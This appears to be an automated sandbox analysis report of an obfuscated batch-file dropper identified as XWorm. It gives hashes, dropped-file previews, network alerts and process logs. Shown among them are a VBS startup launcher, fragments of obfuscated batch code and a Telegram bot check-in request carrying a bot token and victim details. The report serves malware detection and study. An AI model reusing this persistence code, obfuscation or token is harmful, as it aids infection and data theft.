                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Users\user\AppData\Local\Temp\e45iasd.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):452608
                                                        Entropy (8bit):5.459268466661775
                                                        Encrypted:false
                                                        SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                        MD5:04029E121A0CFA5991749937DD22A1D9
                                                        SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                        SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                        SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: PollosAplicaccion.bat, Detection: malicious, Browse
                                                        • Filename: gcapi64.cmd, Detection: malicious, Browse
                                                        • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                        • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: BrowserUpdater.lnk, Detection: malicious, Browse
                                                        • Filename: Updater.lnk, Detection: malicious, Browse
                                                        • Filename: ZG7UaFRPVW.exe, Detection: malicious, Browse
                                                        • Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious, Browse
                                                        • Filename: 7XU2cRFInT.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 22 10:11:20 2024, mtime=Thu Aug 22 10:11:20 2024, atime=Thu Aug 22 10:11:20 2024, length=452608, window=hide
                                                        Category:dropped
                                                        Size (bytes):1051
                                                        Entropy (8bit):4.991339109656745
                                                        Encrypted:false
                                                        SSDEEP:24:8aRWklilnrRxgK0c6KBOAlwZ+63fe7PK2B2jOqygm:8aRWkli5rRm/AlwZ+63WgLyg
                                                        MD5:C9D130C4780164C1496322FD114C1132
                                                        SHA1:1B1D24D5D53A4251ABA131E709806D8C853CAE55
                                                        SHA-256:07247335A0B706EE11B98A32F01E48E64C4393B9C1A6ECEC2D2528A3BE11AF71
                                                        SHA-512:3067CA305FEA1A2316C677953A876A47D96077C5E5AE2FD0CC39B49DEC8B4A0606180157E994DFB4569C46403EC2447D3A0A37EB93A8429EB1C71BBE55DEFA30
                                                        Malicious:true
                                                        Preview:L..................F.... .....N.......N.......N...............................:..DG..Yr?.D..U..k0.&...&.......bBDj...0..................t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y]Y..........................=...A.p.p.D.a.t.a...B.P.1......Y[Y..Local.<......EWsG.Y]Y..........................(..L.o.c.a.l.....N.1......YgY..Temp..:......EWsG.YgY..........................v..T.e.m.p.....b.2......YkY .e45iasd.exe.H.......YkY.YkY....^......................%..e.4.5.i.a.s.d...e.x.e.......[...............-.......Z...........G.n......C:\Users\user\AppData\Local\Temp\e45iasd.exe..(.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.e.4.5.i.a.s.d...e.x.e.............:...........|....I.J.H..K..:...`.......X.......724536...........hT..CrF.f4... ..$.Aw`...,...E...hT..CrF.f4... ..$.Aw`...,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.........9...1SPS..mD..
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:DOS batch file, ASCII text, with very long lines (62943), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):282115
                                                        Entropy (8bit):6.083764870765764
                                                        Encrypted:false
                                                        SSDEEP:6144:h1E5NlqQRcu+pHfFQS7w1bUyntarmxcGqKxH1279F:h1E5qz9H9T7w1bUotqgRH+
                                                        MD5:536AC91B5FE6A53FD85F5D7B609DC591
                                                        SHA1:5FB565C1BEC3E386642E921C34EA365FBCB07127
                                                        SHA-256:AE4100252450220B4F7D39214D4660894EE149D9C96A885F844F0652283198E9
                                                        SHA-512:B47AEBA5A1ABDCD8B1B6BA67663FB199FCA22A21C1417AA830D042268F6C810B9ABF246B964D7DC76497B009F8D54E77C1B0F38E5C775097B9FA15DBD19B748F
                                                        Malicious:true
                                                        Preview:@echo off..%mytRumAlwRAyylcRzqrS%s%mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyylcRzqrS%t%mytRumAlwRAyylcRzqrS%l%mytRumAlwRAyylcRzqrS%o%mytRumAlwRAyylcRzqrS%c%mytRumAlwRAyylcRzqrS%a%mytRumAlwRAyylcRzqrS%l%mytRumAlwRAyylcRzqrS% %mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyylcRzqrS%n%mytRumAlwRAyylcRzqrS%a%mytRumAlwRAyylcRzqrS%b%mytRumAlwRAyylcRzqrS%l%mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyylcRzqrS%d%mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyylcRzqrS%l%mytRumAlwRAyylcRzqrS%a%mytRumAlwRAyylcRzqrS%y%mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyylcRzqrS%d%mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyylcRzqrS%x%mytRumAlwRAyylcRzqrS%p%mytRumAlwRAyylcRzqrS%a%mytRumAlwRAyylcRzqrS%n%mytRumAlwRAyylcRzqrS%s%mytRumAlwRAyylcRzqrS%i%mytRumAlwRAyylcRzqrS%o%mytRumAlwRAyylcRzqrS%n%mytRumAlwRAyylcRzqrS%..set "CDtYvRJiyIBQcHuSWQcP=s"..set "ELecHCQstnjcPFISRcpp=t"..set "OUcGaISKHOvQJLSfisIC=!CDtYvRJiyIBQcHuSWQcP!e!ELecHCQstnjcPFISRcpp!"..!OUcGaISKHOvQJLSfisIC! "XKDjohkzWP=net "..!OUcGaISKHOvQJLSfisIC! "gtnZFFIYXW=file"..!OUcGaISKHOvQJLSfisIC! "NPVRdaQJIF
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):114
                                                        Entropy (8bit):4.808657532006695
                                                        Encrypted:false
                                                        SSDEEP:3:FER/8ClVRK+pn2HoqLTVSREaKC5DXy74UTz4Hhn:FERblVR/p2IqLTwiaZ5DXyQ
                                                        MD5:A67CC5576CAFD563589525C07A083BD4
                                                        SHA1:31661F71346B571F6E9D39B158129CF2D53F6F80
                                                        SHA-256:1A7EDB09533B935471922D084074592FFF865D2A773EE486736F9849FEC092FF
                                                        SHA-512:12A4BD1746A77421ED710FCC772E91120713C6E6E08608CE0B2932FCDB3401A05B58EA1F7DD11E6CEB7E748E90E9AB83E4635E9B4588CBC811CDD3D036066011
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:CreateObject(Replace("WScript.Shell","SubChar","")).Run """C:\Users\user\AppData\Roaming\startup_str_616.bat""", 0
                                                        Process:C:\Windows\System32\net1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):3.6408290408368487
                                                        Encrypted:false
                                                        SSDEEP:3:gAxKEUTaa:gAMEe
                                                        MD5:768165E0ABF16BF3056836D5431A7296
                                                        SHA1:9FB3196BE60E49BFC319EBD9E0B103954D711E34
                                                        SHA-256:B44C505B721E93E2A596577018CC65B993CD632B9FE7620A4B3DB54031AFFF5D
                                                        SHA-512:1250EC40BA20F39A5B9A3AAFD45C63CB6F1BF48B89ACCE1F885470C936FB48A803081943C68458BA1ADCE92D5FE79D3E45682285F56ECB29884D41974269992D
                                                        Malicious:false
                                                        Preview:There are no entries in the list.....
                                                        File type:DOS batch file, ASCII text, with very long lines (62943), with CRLF line terminators
                                                        Entropy (8bit):6.083764870765764
                                                        TrID:
                                                          File name:Pollosappnuevo.bat
                                                          File size:282'115 bytes
                                                          MD5:536ac91b5fe6a53fd85f5d7b609dc591
                                                          SHA1:5fb565c1bec3e386642e921c34ea365fbcb07127
                                                          SHA256:ae4100252450220b4f7d39214d4660894ee149d9c96a885f844f0652283198e9
                                                          SHA512:b47aeba5a1abdcd8b1b6ba67663fb199fca22a21c1417aa830d042268f6c810b9abf246b964d7dc76497b009f8d54e77c1b0f38e5c775097b9fa15dbd19b748f
                                                          SSDEEP:6144:h1E5NlqQRcu+pHfFQS7w1bUyntarmxcGqKxH1279F:h1E5qz9H9T7w1bUotqgRH+
                                                          TLSH:7154BDB713B1EE64CFA4D6B5A55D0C157A3E0226330AC47E89BA4CDCD0E17220D67BDA
                                                          File Content Preview:@echo off..%mytRumAlwRAyylcRzqrS%s%mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyylcRzqrS%t%mytRumAlwRAyylcRzqrS%l%mytRumAlwRAyylcRzqrS%o%mytRumAlwRAyylcRzqrS%c%mytRumAlwRAyylcRzqrS%a%mytRumAlwRAyylcRzqrS%l%mytRumAlwRAyylcRzqrS% %mytRumAlwRAyylcRzqrS%e%mytRumAlwRAyy
                                                          Icon Hash:9686878b929a9886
                                                          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                          2024-08-22T13:12:35.763456+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1497232404192.168.2.995.98.144.201
                                                          2024-08-22T13:11:23.227185+0200TCP2853685ETPRO MALWARE Win32/XWorm Checkin via Telegram149717443192.168.2.9149.154.167.220
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 22, 2024 13:11:22.187124968 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:22.187156916 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:22.187352896 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:22.194412947 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:22.194425106 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:22.829726934 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:22.829802036 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:22.831850052 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:22.831860065 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:22.832115889 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:22.838433027 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:22.880541086 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:23.227217913 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:23.227287054 CEST44349717149.154.167.220192.168.2.9
                                                          Aug 22, 2024 13:11:23.227340937 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:23.235343933 CEST49717443192.168.2.9149.154.167.220
                                                          Aug 22, 2024 13:11:23.409872055 CEST497182404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:23.415710926 CEST24044971895.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:11:23.415790081 CEST497182404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:23.506617069 CEST497182404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:23.511535883 CEST24044971895.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:11:35.470957994 CEST497182404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:35.475816011 CEST24044971895.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:11:44.785048962 CEST24044971895.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:11:44.785130024 CEST497182404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:44.794192076 CEST497182404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:44.798960924 CEST24044971895.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:11:44.804176092 CEST497192404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:44.809031010 CEST24044971995.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:11:44.809113979 CEST497192404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:44.832551956 CEST497192404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:44.841609001 CEST24044971995.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:11:55.375188112 CEST497192404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:11:55.380157948 CEST24044971995.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:05.763204098 CEST497192404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:05.768023968 CEST24044971995.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:06.207626104 CEST24044971995.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:06.207716942 CEST497192404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:07.887938023 CEST497192404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:07.892832994 CEST24044971995.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:07.905164957 CEST497222404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:07.909967899 CEST24044972295.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:07.910056114 CEST497222404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:07.927520037 CEST497222404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:07.932379961 CEST24044972295.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:21.560128927 CEST497222404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:21.565747976 CEST24044972295.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:29.289913893 CEST24044972295.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:29.290071964 CEST497222404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:30.684946060 CEST497222404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:30.689858913 CEST24044972295.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:30.704170942 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:30.709247112 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:30.709429979 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:30.726603985 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:30.731487036 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:35.763456106 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:35.768405914 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:38.654943943 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:38.659805059 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:41.591564894 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:41.596470118 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:45.654145956 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:45.659104109 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:47.591379881 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:47.596373081 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.013223886 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.018187046 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.075758934 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.080786943 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.083328962 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.083379984 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.083444118 CEST497232404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.088187933 CEST24044972395.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.089941978 CEST497242404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.094764948 CEST24044972495.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.094825983 CEST497242404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.116802931 CEST497242404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.121594906 CEST24044972495.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.216404915 CEST497242404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.221457005 CEST24044972495.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:12:52.263138056 CEST497242404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:12:52.268028021 CEST24044972495.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:13:04.029068947 CEST497242404192.168.2.995.98.144.201
                                                          Aug 22, 2024 13:13:04.034118891 CEST24044972495.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:13:13.476423025 CEST24044972495.98.144.201192.168.2.9
                                                          Aug 22, 2024 13:13:13.476505041 CEST497242404192.168.2.995.98.144.201
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 22, 2024 13:11:22.174089909 CEST5405653192.168.2.91.1.1.1
                                                          Aug 22, 2024 13:11:22.181894064 CEST53540561.1.1.1192.168.2.9
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Aug 22, 2024 13:11:22.174089909 CEST192.168.2.91.1.1.10x4849Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Aug 22, 2024 13:11:22.181894064 CEST1.1.1.1192.168.2.90x4849No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                          • api.telegram.org
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.949717149.154.167.2204435264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-22 11:11:22 UTC481OUTGET /bot6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q/sendMessage?chat_id=6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A34B1CC6324AA14E91F87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NW4C52%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
                                                          Host: api.telegram.org
                                                          Connection: Keep-Alive
                                                          2024-08-22 11:11:23 UTC344INHTTP/1.1 403 Forbidden
                                                          Server: nginx/1.18.0
                                                          Date: Thu, 22 Aug 2024 11:11:23 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 89
                                                          Connection: close
                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                          2024-08-22 11:11:23 UTC89INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 73 20 63 61 6e 27 74 20 73 65 6e 64 20 6d 65 73 73 61 67 65 73 20 74 6f 20 62 6f 74 73 22 7d
                                                          Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bots can't send messages to bots"}


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:07:10:59
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Pollosappnuevo.bat" "
                                                          Imagebase:0x7ff724670000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:07:10:59
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:07:10:59
                                                          Start date:22/08/2024
                                                          Path:C:\Windows\System32\net.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:net file
                                                          Imagebase:0x7ff77fed0000
                                                          File size:59'904 bytes
